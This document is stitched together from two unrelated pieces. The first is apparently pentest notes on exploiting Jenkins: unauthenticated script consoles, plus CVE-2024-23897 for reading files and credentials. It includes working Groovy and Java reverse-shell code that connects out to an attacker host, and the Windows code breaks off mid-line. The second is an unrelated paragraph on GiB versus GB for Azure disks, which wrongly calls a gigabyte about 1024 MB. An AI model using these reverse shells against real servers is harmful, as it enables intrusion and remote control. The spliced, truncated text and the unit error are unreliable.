Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
GibiBytes is a unit of data. One GiB is approximately 1.074 GB. [One gibibyte is equal to 1073741824bytes = 1024 mebibytes]. Azure virtual disk sizes are measured in Gibibytes (GiB), which are not
the same as Gigabytes (GB). Therefore, to obtain an approximate equivalent of your virtual disk size
in GB, multiply the size in GiB by 1.074, and that will return a size
in GB. For example, 32,767 GiB would be
approximately 35,183 GB.
Whereas a Gigabyte is an another unit of data storage capacity, is approximately 1024 Mega Bytes (MB). Normal storage disks uses Gigabyte (GB) terminology to represent the storage capacity.